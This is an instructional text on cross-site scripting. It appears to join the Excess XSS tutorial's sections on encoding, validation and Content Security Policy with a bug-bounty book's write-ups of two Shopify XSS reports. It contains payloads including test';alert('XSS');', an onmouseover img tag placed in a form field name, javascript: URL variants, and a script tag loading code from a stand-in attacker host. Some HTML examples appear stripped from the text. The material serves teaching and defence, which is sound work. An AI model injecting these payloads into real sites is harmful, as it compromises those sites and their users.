When performing encoding in client-side code, the language used is always JavaScript, which has built-in functions that encode data for different contexts.

When performing encoding in your server-side code, you rely on the functions available in your language or framework. Because of the large number of languages and frameworks available, this tutorial will not cover the details of encoding in any specific server-side language or framework. However, familiarity with the encoding functions used in client-side JavaScript is also useful when writing server-side code.

Encoding on the client side

When encoding user input on the client side using JavaScript, there are several built-in methods and properties that automatically encode all data in a context-aware manner:

The last context mentioned above (values in JavaScript) is not included in this list, because JavaScript does not provide a built-in way of encoding data that will be included in JavaScript source code.
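The list of methods itself is missing from this copy. As a hedged illustration only, the sketch below uses standard facilities that encode for their own context: encodeURIComponent for URL query values, and the DOM's textContent and setAttribute for element content and attribute values. The example.com URL and the sample string are assumptions; the DOM part is guarded because it only exists in a browser:

```javascript
const untrusted = '<img src=x onerror=alert(1)> & "more"';

// URL query value: encodeURIComponent is a standard JavaScript global.
const searchUrl = "https://example.com/search?q=" + encodeURIComponent(untrusted);
console.log(searchUrl);

// Element content and attribute values: these DOM APIs treat the string as data.
// They are only available in a browser, hence the guard.
if (typeof document !== "undefined") {
  const paragraph = document.createElement("p");
  paragraph.textContent = untrusted;          // HTML element content
  paragraph.setAttribute("title", untrusted); // HTML attribute value
  document.body.appendChild(paragraph);
}
```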

Encoding Limitations

Even with encoding, it is still possible to use malicious strings in some contexts. A clear example of this is when user input is used to provide a URL, such as in the example below:

document.querySelector("a").href = userInput

Although assigning a value to an element's href property automatically encodes it so that it becomes nothing more than an attribute value, this in itself does not prevent an attacker from inserting a URL beginning with "javascript:". When the link is clicked, whatever JavaScript is embedded in the URL will be executed.

Encoding is also not an effective solution when you actually want users to be able to define part of the page's HTML. An example would be a user profile page where the user can use custom HTML. If this custom HTML is encoded, the profile page can consist of plain text only.

In such situations, encoding must be complemented by validation, which we will look at next.

Validation

Validation is the act of filtering user input so that all malicious parts of it are removed, without having to remove all the code in it. One of the most used types of validation in web development allows you to use some HTML elements (for example, and ) while disabling others (for example, ).

Validation has two main characteristics that differ between implementations:

Classification strategy: User input can be classified using either blacklists or whitelists.
Validation result: User input identified as malicious can be either rejected or sanitized.

Classification strategy

Blacklist

Instinctively, it seems reasonable to perform validation by defining a forbidden pattern that should not appear in user input. If a string matches this pattern, it is marked as invalid. An example would be to allow users to submit custom URLs with any protocol except javascript:. This classification strategy is called blacklisting.

However, the blacklist has two main disadvantages:

Complexity: Accurately describing the set of all possible malicious strings is usually a very difficult task. The example policy described above could not be implemented successfully by simply searching for the substring "javascript", because this would miss strings such as "Javascript:" (where the first letter is uppercase) and "&#106;avascript:" (where the first letter is encoded as a numeric character reference).
Staleness: Even if a perfect blacklist were developed, it would fail as soon as a new browser feature allowing malicious use was added. For example, an HTML validation blacklist developed before the HTML5 onmousewheel attribute was introduced would not stop an attacker from using that attribute to perform an XSS attack. This disadvantage is especially significant in web development, which is made up of many different technologies that are constantly being updated.
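The substring problem described above can be reproduced in a few lines. The function name below is a hypothetical one chosen for this sketch:

```javascript
// Naive blacklist check: flags input that contains the substring "javascript".
function looksMaliciousNaive(url) {
  return url.includes("javascript");
}

const exactMatch = looksMaliciousNaive("javascript:alert(1)");        // caught
const upperCase = looksMaliciousNaive("Javascript:alert(1)");         // missed: different case
const encodedLetter = looksMaliciousNaive("&#106;avascript:alert(1)"); // missed: encoded first letter

console.log(exactMatch, upperCase, encodedLetter);
```

Lowercasing the input first would fix the second case but not the third, which is the general pattern with blacklists: each patch covers one variant and leaves others open.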

Because of these shortcomings, blacklisting is strongly discouraged as a classification strategy. Whitelisting is generally a much more secure approach, which we'll describe next.

Whitelist

A whitelist is essentially the opposite of a blacklist: instead of defining a forbidden pattern, the whitelist approach defines an allowed pattern and marks input as invalid if it does not match this pattern.

In contrast to the blacklist example, a whitelist example would be to allow users to submit custom URLs containing only the http: and https: protocols, nothing else. This approach automatically marks a URL as invalid if it uses the javascript: protocol, even if it is written as "Javascript:" or "&#106;avascript:".
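A minimal sketch of such a whitelist check is shown below. It relies on the standard URL constructor, which normalizes the scheme to lowercase and throws on input it cannot parse as an absolute URL; the function and constant names are assumptions made for this example:

```javascript
// Only these schemes are accepted; everything else is invalid by default.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

function isAllowedUrl(input) {
  let parsed;
  try {
    parsed = new URL(input); // throws TypeError for strings that are not absolute URLs
  } catch {
    return false;
  }
  // The parser lowercases the scheme, so "Javascript:" is seen as "javascript:".
  return ALLOWED_PROTOCOLS.has(parsed.protocol);
}

console.log(isAllowedUrl("https://example.com/page"));  // accepted
console.log(isAllowedUrl("Javascript:alert(1)"));       // rejected
console.log(isAllowedUrl("&#106;avascript:alert(1)"));  // rejected
```

Note that this sketch also rejects relative URLs, since they cannot be parsed without a base; whether that is acceptable depends on the application.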

Compared to a blacklist, whitelists have two main advantages:

Simplicity: Accurately describing a set of benign strings is generally much easier than identifying the set of all malicious strings. This is especially true in common situations where user input only needs to include a very limited subset of the functionality available in a browser. For example, the whitelist described above simply allows only URLs with the http: or https: protocols, and in most situations this is quite enough for users.
Longevity: Unlike a blacklist, a whitelist generally does not become obsolete when a new feature is added to the browser. For example, an HTML validation whitelist that allows only the title attribute on HTML elements would remain safe even if it was developed before the introduction of the HTML5 onmousewheel attribute.

Validation result

When user input has been marked as invalid (forbidden), one of two actions can be taken:

Rejection: The input is simply rejected, preventing it from being used elsewhere on the site.
Sanitization: All invalid parts of the input are removed, and the remaining input is used on the website as usual.

Of the two, rejection is the simpler approach to implement. Sanitization, however, can be more useful because it accepts a wider range of input from the user. For example, if a user submits a credit card number, a sanitization routine that removes all non-digit characters would prevent code injection and also allow the user to enter the number with or without hyphens.
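The credit card case can be sketched as follows. The function name is hypothetical, and the routine only strips characters; it does not check that the result is a valid card number:

```javascript
// Whitelist-style sanitization: keep digits, drop every other character.
function sanitizeCardNumber(input) {
  return String(input).replace(/[^0-9]/g, "");
}

const withHyphens = sanitizeCardNumber("4111-1111-1111-1111");
const withMarkup = sanitizeCardNumber("4111 1111<script>alert(1)</script>");

console.log(withHyphens); // digits only, hyphens removed
console.log(withMarkup);  // markup removed along with all other non-digits
```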

If you decide to implement sanitization, you must make sure that the sanitization routine itself does not use a blacklist approach. For example, the URL "Javascript:...", even when identified as invalid using a whitelist approach, would get past a sanitization routine that simply removes all instances of "javascript:". For this reason, well-tested libraries and frameworks should be used for sanitization whenever possible.
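To make the failure concrete, here is a sketch of such a blacklist-style sanitization routine (the function name is an assumption). Besides the capitalized variant mentioned above, it also shows a second, commonly cited bypass that is not taken from this text: nesting the token so that removing it reassembles the forbidden string.

```javascript
// Blacklist-style sanitization: removes every exact occurrence of "javascript:".
function stripJavascriptScheme(url) {
  return url.split("javascript:").join("");
}

const plain = stripJavascriptScheme("javascript:alert(1)");
const capitalized = stripJavascriptScheme("Javascript:alert(1)");
const nested = stripJavascriptScheme("javajavascript:script:alert(1)");

console.log(plain);       // the scheme is removed
console.log(capitalized); // unchanged: the match is case-sensitive
console.log(nested);      // removal glues "java" and "script:" back together
```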

What methods should be used for prevention?

Encoding should be your first line of defense against XSS attacks, because its purpose is to neutralize data so that the browser cannot interpret user input as code. In some cases, encoding must be complemented by validation. Encoding and validation must be applied outbound, because only then do you know in which context the user input will be inserted and which encoding and validation need to be applied.

As a second line of defense, you should apply inbound validation to sanitize or reject clearly invalid user input, such as links using the javascript: protocol. This cannot by itself provide complete security, but it is a useful precaution in case outbound encoding and validation are performed incorrectly somewhere.

If these two lines of defense are used consistently, your site will be protected from XSS attacks. However, due to the complexity of creating and maintaining a website, achieving complete security using only secure input handling can be difficult. As a third line of defense, you should use Content Security Policy (CSP), which we will describe below.

Content Security Policies (CSP)

The disadvantage of protecting against XSS using only secure input handling is that even a single lapse of security can compromise your website. A web standard called Content Security Policy (CSP) can reduce this risk.

CSP is used to constrain the browser viewing your page so that it can only use resources downloaded from trusted sources. A resource is a script, a style sheet, an image, or some other type of file referenced by the page. This means that even if an attacker succeeds in injecting malicious content into your site, CSP can prevent it from ever being executed.

CSP can be used to enforce the following rules:

No untrusted sources: External resources can only be loaded from a set of clearly defined trusted sources.
No inline resources: Inline JavaScript and CSS will not be evaluated.
No eval: The JavaScript eval function cannot be used.

CSP in action

In the following example, the attacker has managed to inject malicious code into the web page:

Last comment:
<script src="http://attacker/malicious-script.js"></script>

With a correctly defined CSP policy, the browser cannot download and execute malicious-script.js because http://attacker/ is not specified as a trusted source. Even though the site failed to reliably process user input in this case, the CSP's policy prevented the vulnerability from causing any harm.

Even if the attacker had injected the script code inline rather than as a link to an external file, a properly defined CSP policy that disallows inline JavaScript would also have prevented the vulnerability from causing any harm.

How to enable CSP?

By default, browsers do not enforce CSP. To enable CSP on your website, pages must be served with an additional HTTP header: Content-Security-Policy. Any page served with this header will have its security policy respected by the browser loading it, provided that the browser supports CSP.

Because the security policy is sent with every HTTP response, it is possible for the server to set the policy individually for each page. The same policy can be applied to the entire website by inserting the same CSP header in every response.
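As an illustration of sending the header with every response, the sketch below sets it on any response object that exposes setHeader(name, value), which is the interface of Node's http.ServerResponse. The policy string, the helper name, and the stand-in response object are assumptions for this example:

```javascript
// Hypothetical site-wide policy; adjust the sources to your own site.
const SITE_POLICY = "default-src 'self'";

// Attach the policy to a response. Passing a different string allows a
// per-page policy; omitting it applies the same policy everywhere.
function applyCsp(response, policy = SITE_POLICY) {
  response.setHeader("Content-Security-Policy", policy);
  return response;
}

// Minimal stand-in for a server response, used here only for demonstration.
const recordedHeaders = {};
const fakeResponse = {
  setHeader(name, value) {
    recordedHeaders[name] = value;
  },
};

applyCsp(fakeResponse);
console.log(recordedHeaders);
```

In a real Node server the same function would be called on the response passed to the request handler before the body is written.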

The value of the Content-Security-Policy header is a string defining one or more security policies that will take effect on your website. The syntax of this string is described below.

The example headers in this section use line breaks and indentation for readability; these should not be present in an actual header.

CSP Syntax

The CSP header syntax is as follows:

Content-Security-Policy:
directive source-expression source-expression ...;
directive ...;
...

This syntax consists of two elements:

Directives are strings specifying a type of resource, taken from a predefined list.
Source expressions are patterns describing one or more servers that resources can be loaded from.

For each directive, the data in the source expression specifies which sources can be used to load resources of the corresponding type.

Directives

The following directives can be used in the CSP header:

connect-src
font-src
frame-src
img-src
media-src
object-src
script-src
style-src

In addition to this, the special default-src directive can be used to provide a default value for all directives that were not included in the header.

Source expression

The syntax for creating a source expression is as follows:

protocol://host-name:port-number

The host name can start with "*.", which means that any subdomain of the provided host name will be allowed. Similarly, the port number can be *, which means that all ports will be allowed. Additionally, the protocol and port number can be omitted. A protocol can also be given by itself (for example, https:), which makes it possible to require that all resources be loaded over HTTPS.

In addition to the syntax above, a source expression can alternatively be one of four keywords that have a special meaning (quotes included):

'none' disallows all resources.
'self' allows resources from the host that served the web page.
'unsafe-inline' allows resources embedded in the page as inline script elements, inline style elements, and javascript: URLs.
'unsafe-eval' allows the use of the JavaScript function eval.

Please note that whenever CSP is used, inline resources and eval are automatically disallowed by default. Using 'unsafe-inline' and 'unsafe-eval' is the only way to allow them.

Example Policy

Content-Security-Policy:
script-src 'self' scripts.example.com;
media-src 'none';
img-src *;
default-src 'self' http://*.example.com

With this example policy, the web page will have the following restrictions:

Scripts can only be downloaded from the host on which the web page is located and from this address: scripts.example.com.
Audio and video files are prohibited from downloading.
Image files can be downloaded from any address.
All other resources can only be loaded from the host on which the web page is located and from any subdomain of example.com.
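Because the real header must be a single line, it can be convenient to keep the policy as a structure and join it when the response is built. The sketch below does this for the example policy; the helper name is an assumption, and the keywords are written with the single quotes that the CSP syntax requires:

```javascript
// Join a map of directive -> source expressions into one header value.
// Sources are separated by spaces, directives by semicolons.
function buildCspHeaderValue(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => name + " " + sources.join(" "))
    .join("; ");
}

const examplePolicy = buildCspHeaderValue({
  "script-src": ["'self'", "scripts.example.com"],
  "media-src": ["'none'"],
  "img-src": ["*"],
  "default-src": ["'self'", "http://*.example.com"],
});

console.log("Content-Security-Policy: " + examplePolicy);
```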

CSP status

As of June 2013, Content Security Policy is a W3C Candidate Recommendation. It is being implemented by browser vendors, but parts of it are still browser-specific. For example, the name of the HTTP header to use can differ between browsers. Before using CSP, consult the documentation of the browsers you intend to support.

Summary

Summary: XSS Overview

An XSS attack is a code injection attack made possible by insecure processing of user input.
A successful XSS attack allows the attacker to execute malicious JavaScript in the victim's browser.
A successful XSS attack compromises the security of both the website and its users.

Summary: XSS attacks

There are three main types of XSS attacks:
- Stored XSS, where malicious input originates from the website's database.
- Reflected XSS, where malicious input originates from the victim's request.
- DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.
All of these attacks are performed differently, but have the same effect if successful.

Summary: Preventing XSS

The most important way to prevent XSS attacks is to perform secure input processing.
- Encoding must be done whenever user input is included in a page.
- In some cases, encoding must be replaced or supplemented by validation.
- Secure input handling must take into account what page context the user input is being inserted into.
- In order to prevent all types of XSS attacks, secure input processing must be done in both client-side and server-side code.
Content Security Policies (CSP) provide an additional layer of protection in the event that secure input processing contains an error.

Appendix

Terminology

It should be noted that there is an overlap in the terminology used to describe XSS: a DOM-based XSS attack can also be either stored or reflected; these are not separate types of attacks. There is no generally accepted terminology that covers all types of XSS without confusion. Regardless of the terminology used, the most important thing is to identify the type of attack, which is possible if you know where the malicious input comes from and where the vulnerability is located.

Rights of use and links

The source code for Excess XSS is available on GitHub.

Excess XSS was created in 2013 as part of the Language-Based Security course at Chalmers University of Technology.

The translation into Russian was made by A888R; the original English text is at excess-xss.com.

Cross-site scripting, or XSS, occurs when a site includes unintended Javascript code that is then delivered to users, who execute it in their browsers. A harmless example of XSS (which is exactly what you should use!) looks like this:

alert('XSS');

This calls the Javascript alert function and creates a simple (and harmless) pop-up window with the letters XSS. In previous versions of the book, I recommended that you use this example when writing reports. That is, until one extremely successful hacker told me that it was a “horrible example,” explaining that the recipient of a vulnerability report might not realize the severity of the problem and, because the example is harmless, might pay out a smaller reward.

So, use this example to detect an XSS vulnerability, but when writing the report, think about the potential harm that the vulnerability could cause and explain it. By this I don't mean telling the company what XSS is, but rather explaining what you can achieve by exploiting the vulnerability and how it could specifically impact their site.

There are three different types of XSS that you may hear about while researching and reporting:

Reflective XSS: These attacks are not stored on the site, meaning the XSS is generated and executed in a single request and response.
Stored XSS: These attacks are stored on the site and are often more dangerous. They are stored on the server and executed on “normal” pages by unsuspecting users.
Self XSS: These attacks are also not stored on the site and are usually used as part of tricking a person into running XSS themselves. When you look for vulnerabilities, you will find that companies often don't care about eliminating Self XSS, they only care about cases where harm to their users may not be done by themselves, but by someone else, as is the case with Reflective and Stored XSS. However, this does not mean that you should not look for Self XSS.

If you find a situation where Self XSS can be executed but not stored, think about how the vulnerability could be exploited. Is there something you could combine it with so that it is no longer Self XSS?

One of the most famous examples of XSS exploitation is the MySpace Samy worm created by Samy Kamkar. In October 2005, Samy exploited a stored XSS vulnerability in MySpace that allowed him to upload Javascript code. The code was executed every time someone visited his MySpace page, adding the visitor as a friend of Samy's profile. Moreover, the code also copied itself to the pages of Samy's new friends, so that their profiles were updated with the following text: “but most of all, samy is my hero.”

Although Samy's exploit was relatively harmless, XSS makes it possible to steal logins, passwords, banking information, and so on. Despite the potential harm, fixing XSS vulnerabilities is generally not difficult: developers simply need to escape user input (just as with HTML injection) when rendering it. Some sites also strip potentially malicious characters when the hacker submits them.

1. Shopify Wholesale

Difficulty: Low
Url: wholesale.shopify.com
Report link: https://hackerone.com/reports/106293
Report date: December 21, 2015
Reward Paid: $500
Description:

The Shopify wholesale site is a simple page with a direct call to action: enter a product name and click “Find Products”. Here's a screenshot:

Screenshot of the wholesale sales site

The XSS vulnerability here was the simplest one you can find: the text entered into the search box was not escaped, so any Javascript entered was executed. Here is the submitted text from the vulnerability description: test';alert('XSS');'

The reason this worked is because Shopify took user input, executed the search query, and if there were no results, printed a message saying there were no search results for the search term entered, showing the unescaped user input on the page. As a result, the submitted Javascript was rendered on the page and browsers interpreted it as executable Javascript.

Conclusions

Test everything, paying special attention to situations where the entered text is rendered on the page. Check to see if you can include HTML or Javascript in your input and see how the site processes it. Also try encoding the input similar to what is described in the chapter on HTML injections.

XSS vulnerabilities don't have to be complex or confusing. This vulnerability was the simplest one imaginable - a simple text input field that does not process user input. And it was discovered on December 21, 2015, and brought the hacker $500! All it took was hacker thinking.

2. Shopify Gift Card Cart

Difficulty: Low
Url: hardware.shopify.com/cart
Report link: https://hackerone.com/reports/95089
Report date: October 21, 2015
Reward Paid: $500
Description:

The Shopify gift card store website allows users to create their own gift card designs using an HTML form that includes a file upload box, a few text fields for details, and so on. Here's a screenshot:

Screenshot of Shopify gift card store form

The XSS vulnerability here was triggered when Javascript was entered into the form field intended for the image title. This is quite easy to do using an intercepting HTTP proxy, which we will talk about later in the “Tools” chapter. So the original form submission included:

Content-Disposition: form-data; name="properties[Artwork file]"

It could be intercepted and changed to:

Content-Disposition: form-data; name="properties[Artwork file<img src='test' onmouseover='alert(2)'>]";

Conclusions

There are two things to note here that will help detect XSS vulnerabilities:

The vulnerability in this case was not directly in the file upload field itself - it was in the field name. So when you're looking to apply XSS, don't forget to play around with all the available field values.

The specified value was sent after it was modified by a proxy. This is important in situations where values are validated on the client side (in your browser) before being sent to the server.

In fact, any time you see live validation running in your browser, it should be a red flag to test that field! Developers can make mistakes by not validating submitted values for malicious code on the server because they hope that the browser's Javascript validation has already done the checking.
